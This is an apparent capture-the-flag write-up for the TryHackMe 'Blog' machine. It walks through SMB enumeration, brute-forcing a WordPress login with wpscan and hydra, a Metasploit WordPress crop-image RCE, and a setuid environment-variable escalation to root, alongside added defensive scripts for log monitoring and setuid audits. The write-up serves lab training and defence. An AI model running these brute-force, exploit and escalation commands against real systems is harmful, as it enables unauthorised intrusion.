Blog - Medium THM

  • OS: Linux
  • Difficulty: Medium
  • Author: Talace

Scanning

Threader3000.py

Port 22 is open
Port 139 is open
Port 80 is open
Port 445 is open

Nmap scan

nmap -p22,80,139,445 -sV -sC -T4 -Pn -oA 10.10.10.5 10.10.10.5

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.0
|_http-title: Billy Joel's IT Blog – The IT blog
|_/wp-admin/
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

SMB Enumeration with enum4linux & smbclient

enum4linux -A 10.10.15.175

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
BillySMB        Disk      Billy's local SMB Share
IPC$            IPC       IPC Service (blog server (Samba, Ubuntu))

Now that we’ve found a share, let’s dig into it.

smbclient --no-pass //10.10.15.175/BillySMB

  Alice-White-Rabbit.jpg              N    33378  Tue May 26 14:17:01 2020
  tswift.mp4                          N  1236733  Tue May 26 14:13:45 2020
  check-this.png                      N     3082  Tue May 26 14:13:43 2020

Nothing interesting there, so let’s move on to the WordPress site.

Exploit

Brute force login page w/ hydra & wpscan

wpscan brute force attack login

wpscan --url http://blog.thm/ --passwords /usr/share/wordlists/rockyou.txt

(another way with hydra) Hydra brute force attack login

hydra -l kwheel -P /usr/share/wordlists/rockyou.txt blog.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username"
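From the defensive side, the same brute-force traffic is easy to spot in the web server’s access log. The following Python script is an added example, not part of the original post and not code from WPScan or Hydra: it parses Apache combined-format lines, tallies POSTs to /wp-login.php per source address and flags any client that exceeds a threshold inside a sliding one-minute window, and separately counts how many of those attempts got the form re-rendered (200) versus a redirect (302), which on a stock WordPress distinguishes a failed login from a successful one. The log lines are constructed for the example, and the threshold and window are assumptions to tune for your own site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache "combined" log format, the layout Apache httpd 2.4 writes by default.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/wp-login.php"

# Constructed access-log lines for the example (not from the box): twelve login
# POSTs from one client in 22 seconds, plus ordinary traffic and one junk line.
SAMPLE_LOG = [
    f'10.8.138.226 - - [26/May/2020:14:20:{sec:02d} +0000] '
    f'"POST /wp-login.php HTTP/1.1" 200 4211 "http://blog.thm/wp-login.php" "Mozilla/5.0"'
    for sec in range(0, 24, 2)
] + [
    '192.0.2.10 - - [26/May/2020:14:20:30 +0000] "GET /wp-login.php HTTP/1.1" 200 3019 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [26/May/2020:14:20:41 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "http://blog.thm/wp-login.php" "Mozilla/5.0"',
    '198.51.100.7 - - [26/May/2020:14:21:05 +0000] "POST /wp-login.php HTTP/1.1" 200 4211 "http://blog.thm/wp-login.php" "Mozilla/5.0"',
    '198.51.100.7 - - [26/May/2020:14:21:09 +0000] "POST /wp-login.php HTTP/1.1" 200 4211 "http://blog.thm/wp-login.php" "Mozilla/5.0"',
    '198.51.100.7 - - [26/May/2020:14:21:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "http://blog.thm/wp-login.php" "Mozilla/5.0"',
    'this line is not in combined log format and is skipped',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def is_login_post(rec):
    """True for a POST to wp-login.php, ignoring any query string."""
    return rec["method"] == "POST" and rec["path"].split("?", 1)[0] == LOGIN_PATH


def find_login_bruteforce(lines, threshold=10, window=timedelta(minutes=1)):
    """Return {ip: peak_count} for clients that sent at least `threshold`
    login POSTs within any `window`-long span. Volume alone is the signal,
    so both failed (200) and successful (302) attempts are counted."""
    recent = defaultdict(deque)   # ip -> timestamps inside the current window
    offenders = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_login_post(rec):
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:   # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            offenders[rec["ip"]] = max(offenders.get(rec["ip"], 0), len(q))
    return offenders


def login_outcomes(lines):
    """Per-IP tally of login POSTs by HTTP status, e.g. {'198.51.100.7': {200: 2, 302: 1}}."""
    tally = defaultdict(lambda: defaultdict(int))
    for line in lines:
        rec = parse_line(line)
        if rec is not None and is_login_post(rec):
            tally[rec["ip"]][rec["status"]] += 1
    return {ip: dict(statuses) for ip, statuses in tally.items()}


if __name__ == "__main__":
    for ip, count in find_login_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {count} login attempts within one minute -> {login_outcomes(SAMPLE_LOG)[ip]}")
```

In production you would stream the real access log into find_login_bruteforce and hand the offending addresses to fail2ban or a WAF rate limit; a client whose tally is many 200s followed by a single 302 is the pattern of a guessed password and deserves a forced reset for the account involved.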

Now let’s search for an exploit in Metasploit:

search WordPress 5.0.0

#  Name                            Disclosure Date  Rank       Check  Description
-  ----                            ---------------  ----       -----  -----------
0  exploit/multi/http/wp_crop_rce  2019-02-19       excellent  Yes    WordPress Crop-image Shell Upload

Perfect! Let’s try it!

use exploit/multi/http/wp_crop_rce
set LHOST 10.8.138.226
set RHOSTS 10.10.15.175
set USERNAME kwheel
set PASSWORD *********

run

Nice, we get our Meterpreter session!

Privilege escalation

Suid file

Found the file

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

-rwsr-sr-x 1 root root 8432 May 26  2020 /usr/sbin/checker

Run ltrace on it to see what it does:

ltrace /usr/sbin/checker

getenv("admin")                                  = "1"
setuid(0)                                        = 0
system("/bin/bash")

Since all the binary needs is an admin variable present (and truthy) in the environment before it calls setuid(0) and spawns a shell, let’s export one:

export admin=1

And run it again!

/usr/sbin/checker
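The find one-liner above is also the first step of a routine defensive audit: list the setuid-root binaries and compare them with what the distribution is expected to ship, so that a hand-added binary such as /usr/sbin/checker stands out. The Python script below is an added example, not part of this post; its UBUNTU_BASELINE set is an illustrative sample rather than an authoritative package manifest, and the temporary-directory fixture in demo_audit() is constructed for the example.

```python
import os
import stat
import tempfile

# Illustrative baseline of setuid-root binaries a stock Ubuntu install ships.
# Assumption for the example: a real audit should derive this from the package
# manager or a known-good snapshot of the host, not from a hard-coded list.
UBUNTU_BASELINE = {
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/umount",
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/passwd", "/usr/bin/sudo",
}


def find_suid_files(root="/", require_root_owner=True):
    """Yield regular files under `root` that carry the setuid bit.
    Equivalent to `find / -user root -perm -4000 2>/dev/null`, but it never
    follows symlinks and silently skips directories it cannot read."""
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not (st.st_mode & stat.S_ISUID):
                continue
            if require_root_owner and st.st_uid != 0:
                continue
            yield path


def unexpected_suid(found, baseline=UBUNTU_BASELINE):
    """Setuid files that are not on the approved list, sorted for stable output."""
    return sorted(set(found) - set(baseline))


def demo_audit():
    """Constructed fixture: a throw-away directory holding one setuid file
    ("checker") and one ordinary file, audited against the baseline."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    suid = os.path.join(root, "checker")
    plain = os.path.join(root, "harmless")
    for path in (suid, plain):
        with open(path, "wb") as fh:
            fh.write(b"#!/bin/sh\nexit 0\n")
    os.chmod(suid, 0o4755)    # set the setuid bit on a file we own (not root's)
    os.chmod(plain, 0o755)
    # The fixture files belong to the caller, so the root-owner filter is off here.
    found = list(find_suid_files(root, require_root_owner=False))
    return [os.path.relpath(p, root) for p in unexpected_suid(found)]


if __name__ == "__main__":
    for path in unexpected_suid(find_suid_files("/")):
        print("unexpected setuid-root binary:", path)
```

Run it as root periodically (or from a file-integrity monitor) and treat every unexpected entry as a finding to inspect with ltrace or strings, exactly as done above; a helper that takes its authorisation decision from an environment variable the caller controls should lose its setuid bit, or be rewritten to check the real uid and group membership instead.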

Got root! Now let’s find user.txt and root.txt; since we know the creator of this box likes to play tricks, search for the files rather than trusting the obvious location.

find / -type f -name "user.txt"

/home/bjoel/user.txt
/media/usb/user.txt

And root.txt!

find / -type f -name "root.txt"

/root/root.txt

This post is licensed under CC BY 4.0 by the author.